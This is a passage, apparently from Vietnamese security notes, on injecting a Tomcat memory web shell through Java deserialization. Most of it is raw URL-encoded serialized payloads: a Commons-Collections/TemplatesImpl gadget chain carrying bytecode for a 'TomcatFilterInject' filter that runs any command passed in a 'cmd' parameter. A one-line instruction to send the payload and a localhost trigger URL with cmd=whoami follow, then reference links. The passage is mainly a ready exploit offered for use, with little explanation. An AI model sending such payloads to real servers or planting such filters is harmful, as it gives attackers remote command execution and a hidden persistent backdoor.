TGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9PYmplY3Q7KVYBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7AQATamF2YS9pby9QcmludFdyaXRlcgEABXdyaXRlAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAFZmx1c2gBAAVjbG9zZQEAD3ByaW50U3RhY2tUcmFjZQAhAB4AHwAAAAAABAABACAAIQABACIAAAAvAAEAAQAAAAUqtwABsQAAAAIAIwAAAAYAAQAAAA0AJAAAAAwAAQAAAAUAJQAmAAAAAQAnACgAAgAiAAAAPwAAAAMAAAABsQAAAAIAIwAAAAYAAQAAAD0AJAAAACAAAwAAAAEAJQAmAAAAAAABACkAKgABAAAAAQArACwAAgAtAAAABAABAC4AAQAnAC8AAgAiAAAASQAAAAQAAAABsQAAAAIAIwAAAAYAAQAAAEIAJAAAACoABAAAAAEAJQAmAAAAAAABACkAKgABAAAAAQAwADEAAgAAAAEAMgAzAAMALQAAAAQAAQAuAAgANAAhAAEAIgAAAd0ABAAHAAAA0BICuAADEgS2AAVLEgYSB7YABUwSBhIItgAFTRIJEgq2AAVOLQS2AAstKiq2AAwQ7362AA4tKyu2AAwQ7362AA4tLCy2AAwQ7362AA4qBLYACysEtgALLAS2AAsqAbYAD5oACSoBBLYAECsBtgARxwAPKwG7ABJZtwATtgAULAG2ABHHAA8sAbsAElm3ABO2ABQsAbYAEcYAMSwBtgARwAASOgQZBLYAFcAAFjoFGQW5ABcBADoGGQYSGLYAGRkGtgAaGQa2ABunAAhLKrYAHbEAAQAAAMcAygAcAAMAIwAAAHIAHAAAABMACwAUABMAFQAbABcAIwAYACgAGQA0ABoAQAAbAEwAHABRAB0AVgAeAFsAIABjACEAaQAkAHEAJQB9ACgAhQApAJEALACZAC0AowAuAK0ALwC2ADAAvQAxAMIAMgDHADYAygA0AMsANQDPADcAJAAAAFIACACjACQANQA2AAQArQAaADcAOAAFALYAEQA5ADoABgALALwAOwA8AAAAEwC0AD0APAABABsArAA%2BADwAAgAjAKQAPwA8AAMAywAEAEAAQQAAAEIAAAAjAAb%2FAGkABAcAQwcAQwcAQwcAQwAAExP%2FADUAAAAAQgcARAQAAQBFAAAAAgBGcHQABWFoaWhpcHcBAHh1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAF2cgAdamF2YXgueG1sLnRyYW5zZm9ybS5UZW1wbGF0ZXMAAAAAAAAAAAAAAHhwc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA%2FQAAAAAAAAHcIAAAAEAAAAAB4eHZyABJqYXZhLmxhbmcuT3ZlcnJpZGUAAAAAAAAAAAAAAHhwcQB%2BAC0%3D

Gửi payload deser để inject malicous Filter

rO0ABXNyADJzdW4ucmVmbGVjdC5hbm5vdGF0aW9uLkFubm90YXRpb25JbnZvY2F0aW9uSGFuZGxlclXK9Q8Vy36lAgACTAAMbWVtYmVyVmFsdWVzdAAPTGphdmEvdXRpbC9NYXA7TAAEdHlwZXQAEUxqYXZhL2xhbmcvQ2xhc3M7eHBzfQAAAAMADWphdmEudXRpbC5NYXAAE2phdmEubGFuZy5DbG9uZWFibGUAFGphdmEuaW8uU2VyaWFsaXphYmxleHIAF2phdmEubGFuZy5yZWZsZWN0LlByb3h54SfaIMwQQ8sCAAFMAAFodAAlTGphdmEvbGFuZy9yZWZsZWN0L0ludm9jYXRpb25IYW5kbGVyO3hwc3EAfgAAc3IAKm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5tYXAuTGF6eU1hcG7llIKeeRCUAwABTAAHZmFjdG9yeXQALExvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNoYWluZWRUcmFuc2Zvcm1lcjDHl%2BwoepcEAgABWwANaVRyYW5zZm9ybWVyc3QALVtMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwdXIALVtMb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLlRyYW5zZm9ybWVyO71WKvHYNBiZAgAAeHAAAAACc3IAO29yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5Db25zdGFudFRyYW5zZm9ybWVyWHaQEUECsZQCAAFMAAlpQ29uc3RhbnR0ABJMamF2YS9sYW5nL09iamVjdDt4cHZyADdjb20uc3VuLm9yZy5hcGFjaGUueGFsYW4uaW50ZXJuYWwueHNsdGMudHJheC5UckFYRmlsdGVyAAAAAAAAAAAAAAB4cHNyAD5vcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuSW5zdGFudGlhdGVUcmFuc2Zvcm1lcjSL9H%2BkhtA7AgACWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7WwALaVBhcmFtVHlwZXN0ABJbTGphdmEvbGFuZy9DbGFzczt4cHVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAFzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3EAfgAYTAAFX25hbWV0ABJMamF2YS9sYW5nL1N0cmluZztMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD%2F%2F%2F%2F%2FdXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAABdXIAAltCrPMX%2BAYIVOACAAB4cAAAGuDK%2Frq%2BAAAANAE%2FCgBRALUHALYIALcKAD4AuAoAuQC6CgC5ALsHALwKAAcAvQcAvgsACQC%2FCACDCwAJAMAIAMELAMIAwwsAwgDECgDFAMYKAMUAxwoAyADJBwDKCgATAMsIAMwKABMAzQoAEwDOCgATAM8IANAKABMA0QoA0gDTCgDSANQKANIA0QcA1QoAHgDWBwDXCgAgANYLANgA2QoAKAC%2FCgBCANoIANsHANwHAN0HAN4KACgAtQgA3wcA4AoAKwC1CgArAOEKACsA4goAPgDjCgArAOQKACcA5QcA5goAMgC1CADnCgAyAOgKADIA4gkA6QDqCgDpAOsKADIA7AoAJwDtCAChBwDuBwDvBwDwBwDxCgA%2BAPIKAPMAugcA9AoA8wD1CwA8APYHAPcKAEUA1gcA%2BAoARwDWBwD5CgBJANYHAPoKAEsA1gcA%2BwoATQDWBwD8CgBPANYHAP0HAP4BAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAFExUb21jYXRGaWx0ZXJJbmplY3Q7AQARZ2V0U2VydmxldENvbnRleHQBACAoKUxqYXZheC9zZXJ2bGV0L1NlcnZsZXRDb250ZXh0OwEADnNlcnZsZXRSZXF1ZXN0AQAeTGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3Q7AQAYbGFzdFNlcnZpY2VkUmVxdWVzdEZpZWxkAQAZTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAC3RocmVhZExvY2FsAQAXTGphdmEvbGFuZy9UaHJlYWRMb2NhbDsBAA1TdGFja01hcFRhYmxlBwD%2FBwC8AQAKRXhjZXB0aW9ucwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsHAQABAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACGRvRmlsdGVyAQBbKExqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXF1ZXN0O0xqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXNwb25zZTtMamF2YXgvc2VydmxldC9GaWx0ZXJDaGFpbjspVgEAAmluAQAVTGphdmEvaW8vSW5wdXRTdHJlYW07AQAHc2Nhbm5lcgEAE0xqYXZhL3V0aWwvU2Nhbm5lcjsBAAZyZXN1bHQBABJMamF2YS9sYW5nL1N0cmluZzsBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247AQABbgEAIExqYXZhL2xhbmcvTnVsbFBvaW50ZXJFeGNlcHRpb247AQAHcmVxdWVzdAEACHJlc3BvbnNlAQAfTGphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlOwEABWNoYWluAQAbTGphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW47AQADY21kAQAGd3JpdGVyAQAVTGphdmEvaW8vUHJpbnRXcml0ZXI7BwDeBwC%2BBwEBBwECBwEDBwEEBwEFBwDKBwDVBwDXBwEGAQAIPGNsaW5pdD4BAA5zZXJ2bGV0Q29udGV4dAEAHkxqYXZheC9zZXJ2bGV0L1NlcnZsZXRDb250ZXh0OwEAD2FwcENvbnRleHRGaWVsZAEAEmFwcGxpY2F0aW9uQ29udGV4dAEALUxvcmcvYXBhY2hlL2NhdGFsaW5hL2NvcmUvQXBwbGljYXRpb25Db250ZXh0OwEAFHN0YW5kYXJkQ29udGV4dEZpZWxkAQAPc3RhbmRhcmRDb250ZXh0AQAqTG9yZy9hcGFjaGUvY2F0YWxpbmEvY29yZS9TdGFuZGFyZENvbnRleHQ7AQAGZmlsdGVyAQAEbmFtZQEACWZpbHRlckRlZgEAMUxvcmcvYXBhY2hlL3RvbWNhdC91dGlsL2Rlc2NyaXB0b3Ivd2ViL0ZpbHRlckRlZjsBAAlmaWx0ZXJNYXABADFMb3JnL2FwYWNoZS90b21jYXQvdXRpbC9kZXNjcmlwdG9yL3dlYi9GaWx0ZXJNYXA7AQAHQ29uZmlncwEADWZpbHRlckNvbmZpZ3MBAA9MamF2YS91dGlsL01hcDsBAAtjb25zdHJ1Y3RvcgEAH0xqYXZhL2xhbmcvcmVmbGVjdC9Db25zdHJ1Y3RvcjsBAAxmaWx0ZXJDb25maWcBADJMb3JnL2FwYWNoZS9jYXRhbGluYS9jb3JlL0FwcGxpY2F0aW9uRmlsdGVyQ29uZmlnOwEAIExqYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb247AQAiTGphdmEvbGFuZy9DbGFzc05vdEZvdW5kRXhjZXB0aW9uOwEAIkxqYXZhL2xhbmcvSWxsZWdhbEFjY2Vzc0V4Y2VwdGlvbjsBAC1MamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvblRhcmdldEV4Y2VwdGlvbjsBACFMamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbjsBACJMamF2YS9sYW5nL0luc3RhbnRpYXRpb25FeGNlcHRpb247BwD3BwD4BwD5BwD6BwD7BwD8AQAKU291cmNlRmlsZQEAF1RvbWNhdEZpbHRlckluamVjdC5qYXZhDABTAFQBAC9vcmcvYXBhY2hlL2NhdGFsaW5hL2NvcmUvQXBwbGljYXRpb25GaWx0ZXJDaGFpbgEAE2xhc3RTZXJ2aWNlZFJlcXVlc3QMAQcBCAcA%2FwwBCQEKDAELAQwBABVqYXZhL2xhbmcvVGhyZWFkTG9jYWwMAQsBDQEAHGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3QMAFoAWwwBDgEPAQAYdGV4dC9odG1sOyBjaGFyc2V0PVVURi04BwEBDAEQAREMARIBEwcBFAwBFQEWDAEXARgHARkMARoBGwEAEWphdmEvdXRpbC9TY2FubmVyDABTARwBAAJcQQwBHQEeDAEfASAMASEBIgEAAAwBIwBUBwEEDAEkAREMASUAVAEAE2phdmEvaW8vSU9FeGNlcHRpb24MASYAVAEAHmphdmEvbGFuZy9OdWxsUG9pbnRlckV4Y2VwdGlvbgcBAgwAcgEnDAEoASkBAAdjb250ZXh0AQArb3JnL2FwYWNoZS9jYXRhbGluYS9jb3JlL0FwcGxpY2F0aW9uQ29udGV4dAEAKG9yZy9hcGFjaGUvY2F0YWxpbmEvY29yZS9TdGFuZGFyZENvbnRleHQBABJUb21jYXRGaWx0ZXJJbmplY3QBAAtTaGVsbEZpbHRlcgEAL29yZy9hcGFjaGUvdG9tY2F0L3V0aWwvZGVzY3JpcHRvci93ZWIvRmlsdGVyRGVmDAEqASsMASwBEQwBLQEiDAEuAREMAS8BMAEAL29yZy9hcGFjaGUvdG9tY2F0L3V0aWwvZGVzY3JpcHRvci93ZWIvRmlsdGVyTWFwAQACLyoMATEBEQcBMgwBMwE0DACbASIMATUBEQwBNgE3AQANamF2YS91dGlsL01hcAEAMG9yZy9hcGFjaGUvY2F0YWxpbmEvY29yZS9BcHBsaWNhdGlvbkZpbHRlckNvbmZpZwEAD2phdmEvbGFuZy9DbGFzcwEAG29yZy9hcGFjaGUvY2F0YWxpbmEvQ29udGV4dAwBOAE5BwE6AQAQamF2YS9sYW5nL09iamVjdAwBOwE8DAE9AT4BAB5qYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb24BACBqYXZhL2xhbmcvQ2xhc3NOb3RGb3VuZEV4Y2VwdGlvbgEAIGphdmEvbGFuZy9JbGxlZ2FsQWNjZXNzRXhjZXB0aW9uAQAramF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvblRhcmdldEV4Y2VwdGlvbgEAH2phdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb24BACBqYXZhL2xhbmcvSW5zdGFudGlhdGlvbkV4Y2VwdGlvbgEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBABRqYXZheC9zZXJ2bGV0L0ZpbHRlcgEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAdamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2UBABlqYXZheC9zZXJ2bGV0L0ZpbHRlckNoYWluAQAQamF2YS9sYW5nL1N0cmluZwEAE2phdmEvaW8vUHJpbnRXcml0ZXIBABNqYXZhL2lvL0lucHV0U3RyZWFtAQAeamF2YXgvc2VydmxldC9TZXJ2bGV0RXhjZXB0aW9uAQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwEADGdldFBhcmFtZXRlcgEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQAOc2V0Q29udGVudFR5cGUBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAAlnZXRXcml0ZXIBABcoKUxqYXZhL2lvL1ByaW50V3JpdGVyOwEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYBAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsBAAdoYXNOZXh0AQADKClaAQAEbmV4dAEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAFY2xvc2UBAAV3cml0ZQEABWZsdXNoAQAPcHJpbnRTdGFja1RyYWNlAQBAKExqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXF1ZXN0O0xqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXNwb25zZTspVgEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwEACXNldEZpbHRlcgEAGShMamF2YXgvc2VydmxldC9GaWx0ZXI7KVYBAA1zZXRGaWx0ZXJOYW1lAQAHZ2V0TmFtZQEADnNldEZpbHRlckNsYXNzAQAMYWRkRmlsdGVyRGVmAQA0KExvcmcvYXBhY2hlL3RvbWNhdC91dGlsL2Rlc2NyaXB0b3Ivd2ViL0ZpbHRlckRlZjspVgEADWFkZFVSTFBhdHRlcm4BABxqYXZheC9zZXJ2bGV0L0Rpc3BhdGNoZXJUeXBlAQAHUkVRVUVTVAEAHkxqYXZheC9zZXJ2bGV0L0Rpc3BhdGNoZXJUeXBlOwEADXNldERpc3BhdGNoZXIBABJhZGRGaWx0ZXJNYXBCZWZvcmUBADQoTG9yZy9hcGFjaGUvdG9tY2F0L3V0aWwvZGVzY3JpcHRvci93ZWIvRmlsdGVyTWFwOylWAQAWZ2V0RGVjbGFyZWRDb25zdHJ1Y3RvcgEAMyhbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L0NvbnN0cnVjdG9yOwEAHWphdmEvbGFuZy9yZWZsZWN0L0NvbnN0cnVjdG9yAQALbmV3SW5zdGFuY2UBACcoW0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAANwdXQBADgoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwAhACgAUQABAFIAAAAGAAEAUwBUAAEAVQAAAC8AAQABAAAABSq3AAGxAAAAAgBWAAAABgABAAAAEwBXAAAADAABAAAABQBYAFkAAAAJAFoAWwACAFUAAACZAAIAAwAAADISAhIDtgAESyoEtgAFKgG2AAbAAAdMK8YAGSu2AAjGABIrtgAIwAAJTSy5AAoBALABsAAAAAMAVgAAAB4ABwAAAEcACABIAA0ASQAWAEoAIQBLACkATAAwAE4AVwAAACAAAwApAAcAXABdAAIACAAqAF4AXwAAABYAHABgAGEAAQBiAAAACwAB%2FQAwBwBjBwBkAGUAAAAIAAMARwBFAEkAAQBmAGcAAgBVAAAAPwAAAAMAAAABsQAAAAIAVgAAAAYAAQAAAFQAVwAAACAAAwAAAAEAWABZAAAAAAABAGgAaQABAAAAAQBqAGsAAgBlAAAABAABAGwAAQBmAG0AAgBVAAAASQAAAAQAAAABsQAAAAIAVgAAAAYAAQAAAFkAVwAAACoABAAAAAEAWABZAAAAAAABAGgAaQABAAAAAQBuAG8AAgAAAAEAcABxAAMAZQAAAAQAAQBsAAEAcgBzAAIAVQAAAbUAAwAJAAAAgysSC7kADAIAOgQsEg25AA4CACy5AA8BADoFGQTGAF64ABAZBLYAEbYAEjoGuwATWRkGtwAUEhW2ABY6BxkHtgAXmQALGQe2ABinAAUSGToIGQe2ABoZBRkItgAbGQW2ABwZBbYAHacAFDoGGQa2AB%2BnAAo6BhkGtgAhLSssuQAiAwCxAAIAHwBmAGkAHgAfAGYAcwAgAAMAVgAAAE4AEwAAAFwACgBdABIAXgAaAF8AHwBhACwAYwA8AGQAUABlAFUAZgBcAGcAYQBoAGYAbQBpAGkAawBqAHAAbQBzAGsAdQBsAHoAbwCCAHAAVwAAAHAACwAsADoAdAB1AAYAPAAqAHYAdwAHAFAAFgB4AHkACABrAAUAegB7AAYAdQAFAHwAfQAGAAAAgwBYAFkAAAAAAIMAfgBdAAEAAACDAH8AgAACAAAAgwCBAIIAAwAKAHkAgwB5AAQAGgBpAIQAhQAFAGIAAABGAAX%2FAEwACAcAhgcAhwcAiAcAiQcAigcAiwcAjAcAjQAAQQcAiv8AGgAGBwCGBwCHBwCIBwCJBwCKBwCLAAEHAI5JBwCPBgBlAAAABgACAB4AkAAIAJEAVAABAFUAAAMFAAUADQAAASS4ACNLKrYAJBIltgAETCsEtgAFKyq2AAbAACZNLLYAJBIltgAETi0EtgAFLSy2AAbAACc6BLsAKFm3ACk6BRIqOga7ACtZtwAsOgcZBxkFtgAtGQcZBrYALhkHGQW2ACS2AC%2B2ADAZBBkHtgAxuwAyWbcAMzoIGQgSNLYANRkIGQa2ADYZCLIAN7YAOLYAORkEGQi2ADoZBLYAJBI7tgAEOgkZCQS2AAUZCRkEtgAGwAA8OgoSPQW9AD5ZAxI%2FU1kEEitTtgBAOgsZCwS2AEEZCwW9AEJZAxkEU1kEGQdTtgBDwAA9OgwZChkGGQy5AEQDAFenADBLKrYARqcAKEsqtgBIpwAgSyq2AEqnABhLKrYATKcAEEsqtgBOpwAISyq2AFCxAAYAAADzAPYARQAAAPMA%2FgBHAAAA8wEGAEkAAADzAQ4ASwAAAPMBFgBNAAAA8wEeAE8AAwBWAAAAtgAtAAAAFwAEABgADgAZABMAGgAcABsAJgAcACsAHQA1AB8APgAgAEIAIQBLACIAUgAjAFkAJABmACUAbQAnAHYAKAB9ACkAhAAqAI8AKwCWAC0AogAuAKgALwC0ADEAyQAyAM8AMwDnADQA8wBCAPYANgD3ADcA%2BwBCAP4AOAD%2FADkBAwBCAQYAOgEHADsBCwBCAQ4APAEPAD0BEwBCARYAPgEXAD8BGwBCAR4AQAEfAEEBIwBDAFcAAADAABMABADvAJIAkwAAAA4A5QCUAF8AAQAcANcAlQCWAAIAJgDNAJcAXwADADUAvgCYAJkABAA%2BALUAmgBZAAUAQgCxAJsAeQAGAEsAqACcAJ0ABwB2AH0AngCfAAgAogBRAKAAXwAJALQAPwChAKIACgDJACoAowCkAAsA5wAMAKUApgAMAPcABAB6AKcAAAD%2FAAQAegCoAAABBwAEAHoAqQAAAQ8ABAB6AKoAAAEXAAQAegCrAAABHwAEAHoArAAAAGIAAAAdAAf3APYHAK1HBwCuRwcAr0cHALBHBwCxRwcAsgQAAQCzAAAAAgC0cHQABWFoaWhpcHcBAHh1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAF2cgAdamF2YXgueG1sLnRyYW5zZm9ybS5UZW1wbGF0ZXMAAAAAAAAAAAAAAHhwc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA%2FQAAAAAAAAHcIAAAAEAAAAAB4eHZyABJqYXZhLmxhbmcuT3ZlcnJpZGUAAAAAAAAAAAAAAHhwcQB%2BAC0%3D

http://localhost:8989/TomcatDeser2Memshell_war/?cmd=whoami

Refer

Java Deserialization p1 - TemplateImpl class and its utilization chaindevme4f.github.io

https://xz.aliyun.com/t/7348?time__1311=n4%2BxnD0Dy7%3DYq0KitD%2FiW%2B4QwFSYYbYDcAxhoD#toc-0xz.aliyun.com

PreviousMemshell in Tomcat NextMemshell in Spring

Last updated 12 months ago